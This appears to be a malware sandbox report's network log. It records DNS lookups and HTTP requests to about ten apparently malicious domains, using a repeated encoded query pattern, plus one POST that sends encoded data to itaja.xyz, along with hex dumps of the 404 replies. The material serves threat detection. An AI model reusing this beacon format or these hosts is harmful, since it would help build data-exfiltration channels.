Source: global traffic	HTTP traffic detected: GET /7r21/?GX4dS=Zcl8OC2U2mZSOodQP89hLxJaF9oxIylC3vQVS5j+kQePBp9DPErvqQJ5GN/fq92ZSua+eOkgWypb4NJRPdpqD2l3+Txvj2dKnJzbedJ/jR6LsqpOy2ysxaE=&QHdD=Mr7PG HTTP/1.1Host: www.cricketinsights.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /piim/?GX4dS=RYsZikA+gzGvj7iZiTCDr+aQt7fmUZTyGCVkHuEfnLcd5+XBs56/1e6IekUyxiYXxJTamO9QBVR7KuXqJ7BSZgW6PH27nc20dnk3ICKQzrrMBcAKjPIq1No=&QHdD=Mr7PG HTTP/1.1Host: www.itaja.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /nwnl/?GX4dS=beqecatXY4qIJjPXOia4kQmqT9sqBvOCFEuBM0i0Dlt4M9tlrl1tg88laI+FpgcKerQYOIncNJ3shYG/Ub3oJIvQtmlajUKZMxQvi2F/DOJ3YHvB9A08ObE=&QHdD=Mr7PG HTTP/1.1Host: www.coba168.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /s7c9/?GX4dS=AvCjDDvglUmypHRh3tcpFDEnXU0eyxJ0gEyBu7LJ6NAS+DraqwYREr+jqcUkWNOrfKJXuGVAM+jH6WkALlmgLCdPJ31xuM0fYjGNAwDkyRY4kQ2+D/EajS4=&QHdD=Mr7PG HTTP/1.1Host: www.cctv9.restAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /wieb/?QHdD=Mr7PG&GX4dS=eg7bLBeRfjnWkUSkFPDFz7CDjhz4SauAKYy7Gl2+zW+bwKjkoH9UXc52MkveFRCVuGtTn8uwV230S6082MDCqbLQ2LkwAkuHHQvkznNaIdZpiNU96nR7hSc= HTTP/1.1Host: www.havfabi.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /a1sy/?GX4dS=43kMdQUk4RwRJMi6yD+2w8EPj2c5h/nzCBj69vS+SY4LuE9CgiSoK5ODTlc+3PfTwBmzR2IwCrk+5EAKTw2sMvYmaCzYBStST9GoSzlhXbP5C08N1MLucTc=&QHdD=Mr7PG HTTP/1.1Host: www.appointy.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /prdf/?QHdD=Mr7PG&GX4dS=N/KEGDqp5WK7R7QNRoFQ4/TvMZ3DPGQhB7JjPYgVV+XpEUcX47NGW/blkAtXlqOMddn0lmmWVt6FtFHbnRpj1unWlirPQI35p0XdBkbFDcY28+naIT5FW58= HTTP/1.1Host: www.30kfeet.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /v6hi/?GX4dS=J4OZQFJkwHb7CqxUSgK5kC7bOCRQ1HDFuBm9sh8+Hwi6g72gNv5/qcE3wP+eGlRxbFCI7z2mPoN0ns0tJj8yIlhQwyv+KQ3WGhFwXvk/5rV44M5qziNnSOc=&QHdD=Mr7PG HTTP/1.1Host: www.meliorahomes.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Source: global traffic	HTTP traffic detected: GET /vyi4/?GX4dS=/xy0pcQoI48O0GHyPYCEmU2R4Hpu0VZORDN/dAaN/HIxdTX0a/Tw+B0GG8XhGWU8PZV29+oHaQZBX3c3szNNFJMBEHP/DJI13k5P4rPNXnp/cIoi/p+Ic+M=&QHdD=Mr7PG HTTP/1.1Host: www.restobarbebek.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Source: global traffic	DNS traffic detected: DNS query: www.cricketinsights.info
Source: global traffic	DNS traffic detected: DNS query: www.itaja.xyz
Source: global traffic	DNS traffic detected: DNS query: www.coba168.info
Source: global traffic	DNS traffic detected: DNS query: www.cctv9.rest
Source: global traffic	DNS traffic detected: DNS query: www.havfabi.life
Source: global traffic	DNS traffic detected: DNS query: www.appointy.shop
Source: global traffic	DNS traffic detected: DNS query: www.30kfeet.net
Source: global traffic	DNS traffic detected: DNS query: www.meliorahomes.net
Source: global traffic	DNS traffic detected: DNS query: www.restobarbebek.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mynotebook.shop

Source: unknown

HTTP traffic detected: POST /piim/ HTTP/1.1Host: www.itaja.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.itaja.xyzReferer: http://www.itaja.xyz/piim/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 202User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Data Raw: 47 58 34 64 53 3d 63 61 45 35 68 54 30 59 38 69 75 35 6f 6f 54 36 39 43 57 63 35 65 48 4a 6f 72 33 6b 54 4c 43 30 56 43 30 55 57 4d 51 32 2b 76 63 33 6f 2f 44 52 6a 36 4f 4e 6d 2b 76 5a 5a 57 63 46 7a 54 35 52 67 74 58 46 73 66 6c 30 5a 6e 6f 2b 47 50 47 47 55 71 74 68 43 67 48 67 4e 44 37 67 75 73 2b 4f 46 47 6f 6e 48 6b 75 68 33 72 65 68 50 74 67 59 70 38 55 38 2b 4f 53 5a 32 62 7a 77 53 63 52 76 4f 4f 63 51 79 4f 4f 71 37 74 44 77 69 36 6d 4c 62 34 61 63 4d 45 72 31 47 79 64 67 7a 49 69 6e 35 7a 41 6e 6e 7a 4d 6c 32 56 34 32 38 71 65 74 4d 77 33 7a 79 43 6f 54 47 46 72 58 33 4e 57 79 4b 67 3d 3d Data Ascii: GX4dS=caE5hT0Y8iu5ooT69CWc5eHJor3kTLC0VC0UWMQ2+vc3o/DRj6ONm+vZZWcFzT5RgtXFsfl0Zno+GPGGUqthCgHgND7gus+OFGonHkuh3rehPtgYp8U8+OSZ2bzwScRvOOcQyOOq7tDwi6mLb4acMEr1GydgzIin5zAnnzMl2V428qetMw3zyCoTGFrX3NWyKg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:31:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 53 e3 38 10 bd e7 57 f4 f8 c2 25 b6 03 84 29 86 4d 52 35 43 b2 45 aa 98 81 02 4f 4d 71 94 e5 56 ac 45 96 bc 92 8c 93 ad fd 43 9c f7 27 f0 c7 b6 65 25 2c f3 b1 27 47 52 bf f7 ba 5f 77 67 f6 6e 79 73 59 3c dc ae e0 aa f8 7c 0d b7 5f 3f 5d af 2f 21 49 f3 fc db e9 65 9e 2f 8b 65 7c 98 66 93 e3 3c 5f 7d 49 20 a9 bd 6f 2f f2 bc ef fb ac 3f cd 8c dd e4 c5 5d 5e fb 46 4d 73 e7 ad e4 3e ab 7c 95 2c 46 b3 70 07 8a e9 cd 3c 11 76 b8 40 56 d1 7d 83 9e 41 60 49 f1 cf 4e 3e cd 93 4b a3 3d 6a 9f 16 bb 16 13 e0 f1 34 4f 3c 6e fd 40 fc 1b f0 9a 59 87 7e de 79 91 9e 07 aa 81 43 b3 06 e7 89 35 a5 f1 ee 0d 4e 1b 8d 63 6d a4 ae 70 4b 5f 61 94 32 fd 2b e8 ad 30 67 bc c6 34 08 5a a3 be 63 48 87 a7 5f 82 5a cb 36 0d fb 9f e8 62 5d 5c af 16 d3 c9 14 be 18 0f bf 9b 4e 57 b3 3c 5e 8e 66 f9 d5 ea e3 92 92 ff 74 b3 7c a0 cf d5 f1 e2 4d 10 9d 46 45 8d 60 c9 14 74 1e 2b a8 0c ef 1a f2 05 7a e6 40 13 9d 08 74 60 34 f8 5a 3a 70 68 9f d0 66 a3 d9 6d e0 ba 3b 10 6a 28 ac e9 9e 5e 9e 49 8e 28 af f1 3f 9e 0a 1b a6 ab 97 67 d0 47 0c 5a 22 7d 79 f6 74 a2 e2 43 3c b8 ce 02 c7 c8 db fd 4c 0c 2b 3d 38 c5 2a 13 a9 57 ea 95 da 80 33 4a 72 e9 e9 91 52 25 0e c0 18 fd f2 0f fd 82 50 d0 40 2c 2b f3 1d f3 c7 e5 f2 6e 75 7f bf 18 7d c3 12 ee 87 8a 80 51 c5 34 5c 44 f6 07 cb b6 bb bf 00 fe 06 b8 35 3d 5a 32 a5 dc 0d 8f aa 77 99 b0 c3 cb 7a 79 01 65 39 3d 7f ff 61 c2 cb 6a 32 29 cf cf 10 c5 29 2f 4f 4e 26 67 a5 f8 20 f8 f1 7b f2 fe 55 69 96 ef fd cf c3 c8 2f 46 a3 d9 bb 34 1d 01 40 0a 5f b5 30 d6 77 9a 79 54 bb 31 7c 96 dc 1a 67 84 87 9a cc 62 55 45 fa 0c b8 42 f2 1d 34 f6 11 94 08 64 be b3 34 b9 de c0 9a 26 d9 6a f4 b0 da b6 ca 58 ea 0f ac 05 f5 0b 21 4c 33 18 11 31 8c 2c b1 d6 d8 23 07 0d 3a c7 36 08 d4 d1 c4 1b b2 ae 61 4a 25 63 70 2d 72 29 24 a7 d3 2e 82 14 45 12 15 61 cf 8e 4f c8 08 8f 6e fc b3 20 0d 10 65 a3 5d c4 48 ef c0 f4 7b b5 83 56 06 0f a6 03 4e 44 21 32 50 86 cc c4 38 42 ca ce 83 f4 94 59 4b 4c 7e 47 e3 21 f9 23 7d 0c 08 5a 29 70 bd f4 bc 26 b4 52 58 45 44 42 39 5b 1f 2b 3a 68 b8 24 83 22 10 37 c8 34 e5 69 04 2d 76 47 4b bc 57 19 44 5d 4d 76 ff 80 03 66 91 c6 50 3b 72 6f 68 77 85 82 75 ca 67 51 6b bd be 07 a6 7a b6 73 87 42 7f c4 0f cc 81 44 19 bd 89 20 d4 a6 db d4 a1 84 86 3d e2 2f 3c ab 59 db ee 42 c2 18 01 bd b1 8f 8c d6 82 ea a5 be ec 8d 70 b2 69 15 5e d0 e6 54 43 47 87 0e c6 f8 43 13 c9 9b 9a 46 a4 94 1b aa b6 19 96 57 49 52 1c 16 96 e4 db ce d5 64 6e 04 99 30 46 61 34 84 7c 42 a8 49 2c 54 4c 1b 0a be 47 45 57 43 8b a1 91 5a 36 5d b3 af ff e6 d5 c7 a1 6f d4 26 dc 32 ee 15 ad 45 70 7b 67 ba 23 2a dd d2 3f ad 3c 54 6f e5 a6 f6 b4 95 7d a4 48 17 a3 7f 01 e4 d0 17 cf f6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36cuTMS8W%)MR5CEOMqVEC'e%,'GR_wgnysY<\|_?]/!Ie/e\|f<_}I o/?]^FMs>\|,Fp
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:31:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 cb 72 db 38 10 bc eb 2b 26 bc f8 22 92 b6 ac 24 b2 57 52 55 62 69 cb aa 72 62 97 cd 54 ca 47 08 1c 88 88 41 80 0b 80 a6 b4 b5 3f e4 f3 7e 82 7f 6c 07 84 e4 75 5e 27 0a c0 74 f7 4c cf 8c a6 6f 16 d7 17 c5 fd cd 12 2e 8b 4f 57 70 f3 e5 e3 d5 ea 02 92 34 cf bf 9e 5e e4 f9 a2 58 c4 87 71 76 7c 92 e7 cb cf 09 24 95 f7 cd 79 9e 77 5d 97 75 a7 99 b1 9b bc b8 cd 2b 5f ab 71 ee bc 95 dc 67 a5 2f 93 f9 60 1a ee 40 31 bd 99 25 c2 f6 17 c8 4a ba af d1 33 08 2c 29 fe d5 ca c7 59 72 61 b4 47 ed d3 62 d7 60 02 3c 9e 66 89 c7 ad ef 89 ff 00 5e 31 eb d0 cf 5a 2f d2 49 a0 ea 39 34 ab 71 96 58 b3 36 de bd c2 69 a3 71 a8 8d d4 25 6e e9 2b 8c 52 a6 7b 01 bd 16 e6 8c 57 98 06 41 6b d4 77 0c 69 ff f4 4b 50 63 d9 a6 66 bf 89 2e 56 c5 d5 72 3e 3e 1e c3 67 e3 e1 4f d3 ea 72 9a c7 cb c1 34 bf 5c 7e 58 50 f2 1f af 17 f7 f4 b9 3c 99 bf 0a a2 d3 a0 a8 10 2c 99 82 ce 63 09 a5 e1 6d 4d be 40 c7 1c 68 a2 13 81 0e 8c 06 5f 49 07 0e ed 23 da 6c 30 bd 09 5c b7 07 42 0d 85 35 ed e3 f3 13 c9 11 e5 15 fe cf 53 62 cd 74 f9 fc 04 fa 88 41 43 a4 cf 4f 9e 4e 54 7c 88 07 d7 5a e0 18 79 db 9f 89 61 a9 7b a7 58 69 22 f5 52 bd 50 1b 70 46 49 2e 3d 3d 52 aa c4 01 18 a3 9f ff a5 5f 10 0a ea 89 65 69 be 63 fe b0 58 dc 2e ef ee e6 83 af b8 86 bb be 22 60 54 31 0d 17 91 7d 63 d9 76 f7 37 c0 3f 00 37 a6 43 4b a6 ac 77 fd a3 ea 5c 26 6c ff b2 5a 9c c3 7b 7e 7a 2a 70 74 72 c6 d9 04 47 9c bd 5f 9f 8d 47 7c 32 12 93 63 f1 f6 ec dd 84 bc 7f 51 9a e6 7b ff f3 30 f2 f3 c1 60 fa 26 4d 07 00 90 c2 17 2d 8c f5 ad 66 1e d5 6e 08 9f 24 b7 c6 19 e1 a1 22 b3 58 59 92 3e 03 ae 90 7c 07 8d 5d 04 25 02 99 6f 2d 4d ae 37 b0 a2 49 b6 1a 3d 2c b7 8d 32 96 fa 03 2b 41 fd 42 08 d3 0c 46 44 0c 23 4b ac 35 f6 c8 41 8d ce b1 0d 02 75 34 f1 86 ac ab 99 52 c9 10 5c 83 5c 0a c9 e9 b4 8b 20 45 91 44 45 d8 b7 27 23 32 c2 a3 1b fe 2c 48 03 44 d9 68 17 31 d2 3b 30 dd 5e ed a0 95 c1 bd 69 81 13 51 88 0c 94 21 33 31 8c 90 75 eb 41 7a ca ac 21 26 bf a3 f1 90 fc 81 3e 06 04 ad 14 b8 4e 7a 5e 11 5a 29 2c 23 22 a1 9c ad 8f 15 1d 34 5c 92 41 11 88 6b 64 9a f2 34 82 16 bb a5 25 de ab f4 a2 ae 22 bb 7f c0 01 b3 48 63 a8 1d b9 d7 b7 bb 44 c1 5a e5 b3 a8 b5 5a dd 01 53 1d db b9 43 a1 3f e2 7b e6 40 a2 8c de 44 10 6a d3 6e aa 50 42 cd 1e f0 17 9e 55 ac 69 76 21 61 8c 80 ce d8 07 46 6b 41 f5 52 5f f6 46 38 59 37 0a cf 69 73 ca be a3 7d 07 63 fc a1 89 e4 4d 45 23 b2 96 1b aa b6 ee 97 57 49 52 ec 17 96 e4 9b d6 55 64 6e 04 99 30 46 61 34 84 7c 44 a8 48 2c 54 4c 1b 0a be 43 45 57 7d 8b a1 96 5a d6 6d bd af ff fa c5 c7 be 6f d4 26 dc 32 ee 15 ad 45 70 7b 67 da 23 2a dd d2 3f ad 3c 54 6f e5 a6 f2 b4 95 5d a4 48 e7 83 ff 00 6e 50 40 b9 f6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36cuTr8+&"$WRUbirbTGA?~lu^'tLo.OWp4^Xqv\|$yw]u+_qg/`@1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:31:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 36 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 cb 72 e3 36 10 bc f3 2b 66 79 f1 45 24 2d ad 14 3b 8e a4 aa 5d 4b 29 ab ca bb 76 d9 dc da f2 11 02 87 22 62 10 60 00 d0 14 53 f9 21 9f f3 09 fe b1 0c 08 c9 f1 3e 72 a2 00 4c 77 cf f4 cc 68 fe 6e 75 73 99 3f dc ae e1 2a ff 74 0d b7 5f 3e 5e 6f 2e 21 4e b2 ec eb fb cb 2c 5b e5 ab f0 30 4d 4f c7 59 b6 fe 1c 43 5c 39 d7 5c 64 59 d7 75 69 f7 3e d5 66 97 e5 77 59 e5 6a 39 cd ac 33 82 bb b4 70 45 bc 8c e6 fe 0e 24 53 bb 45 5c 9a e1 02 59 41 f7 35 3a 06 9e 25 c1 3f 5b f1 b4 88 2f b5 72 a8 5c 92 f7 0d c6 c0 c3 69 11 3b dc bb 81 f8 37 e0 15 33 16 dd a2 75 65 72 ee a9 06 0e c5 6a 5c c4 46 6f b5 b3 6f 70 4a 2b 1c 29 2d 54 81 7b fa 96 5a 4a dd bd 82 de 0a 73 c6 2b 4c bc a0 d1 f2 1b 86 64 78 fa 29 a8 31 6c 57 b3 ff 89 ce 37 f9 f5 7a 39 3d 9d c2 67 ed e0 77 dd aa 62 9e 85 cb 68 9e 5d ad 3f ac 28 f9 8f 37 ab 07 fa 5c 8d 97 6f 82 e8 14 e5 15 82 21 53 d0 3a 2c a0 d0 bc ad c9 17 e8 98 05 45 74 a5 a7 03 ad c0 55 c2 82 45 f3 84 26 8d e6 b7 9e eb ee 48 a8 20 37 ba 7d 7a 79 26 39 a2 bc c6 ff 78 0a ac 99 2a 5e 9e 41 9d 30 68 88 f4 e5 d9 d1 89 8a f7 f1 60 5b 03 1c 03 6f fb 23 31 ac d5 e0 14 2b 74 a0 5e cb 57 6a 0d 56 4b c1 85 a3 47 4a 95 38 00 43 f4 cb 3f f4 0b 7c 41 03 b1 28 f4 37 cc 1f 56 ab bb f5 fd fd 32 fa 8a 5b b8 1f 2a 02 46 15 d3 70 11 d9 1f 2c dd f7 7f 01 fc 0d 70 ab 3b 34 64 ca b6 1f 1e 65 67 d3 d2 0c 2f 9b d5 05 20 9f 14 67 e3 d9 d9 2f bf 9e f3 19 e7 a7 93 f3 d9 6c 32 9e 4e a6 6c 3b d9 9e 8d 4b f2 fe 55 69 9e 1d fc cf fc c8 2f a3 68 fe 2e 49 22 00 48 e0 8b 2a b5 71 ad 62 0e 65 3f 82 4f 82 1b 6d 75 e9 a0 22 b3 58 51 90 3e 03 2e 91 7c 07 85 5d 00 c5 25 32 d7 1a 9a 5c a7 61 43 93 6c 14 3a 58 ef 1b a9 0d f5 07 36 25 f5 0b c1 4f 33 e8 32 60 18 59 62 8c 36 27 16 6a b4 96 ed 10 a8 a3 b1 d3 64 5d cd a4 8c 47 60 1b e4 a2 14 9c 4e 7d 00 49 8a 24 2a c2 ce c6 13 32 c2 a1 1d fd 28 48 03 44 d9 28 1b 30 c2 59 d0 dd 41 ed a8 95 c2 83 6e 81 13 91 8f f4 94 3e b3 72 14 20 db d6 81 70 94 59 43 4c ae a7 f1 10 fc 91 3e 1a 4a 5a 29 b0 9d 70 bc 22 b4 94 58 04 44 4c 39 1b 17 2a 3a 6a d8 38 85 dc 13 d7 c8 14 e5 a9 4b 5a ec 96 96 f8 a0 32 88 da 8a ec fe 0e 07 cc 20 8d a1 b2 e4 de d0 ee 02 4b d6 4a 97 06 ad cd e6 1e 98 ec 58 6f 8f 85 7e 8f 1f 98 3d 89 d4 6a 17 40 a8 74 bb ab 7c 09 35 7b c4 9f 78 56 b1 a6 e9 7d c2 18 00 9d 36 8f 8c d6 82 ea a5 be 1c 8c b0 a2 6e 24 5e d0 e6 14 43 47 87 0e 86 f8 63 13 c9 9b 8a 46 64 2b 76 54 6d 3d 2c af 14 a4 38 2c 2c c9 37 ad ad c8 dc 00 d2 7e 8c fc 68 94 e2 09 a1 22 31 5f 31 6d 28 b8 0e 25 5d 0d 2d 86 5a 28 51 b7 f5 a1 fe 9b 57 1f 87 be 51 9b 70 cf b8 93 b4 16 de ed 5e b7 27 54 ba a1 7f 5a 71 ac de 88 5d e5 68 2b bb 40 91 2c a3 7f 01 c1 61 bd cd f6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 36duTr6+fyE$-;]K)v"b`S!>rLwhnus?*t_>^o.!N,[0MOYC\9\dYui>fwYj93pE
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:31:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 69 74 61 6a 61 2e 78 79 7a 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 20 20 7c 20 20 49 44 3a 20 33 66 37 32 34 31 63 32 36 39 33 38 34 61 66 39 37 30 38 35 32 35 66 33 65 37 33 34 36 64 33 39 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Mon, 30 Sep 2024 06:32:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 06:32:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 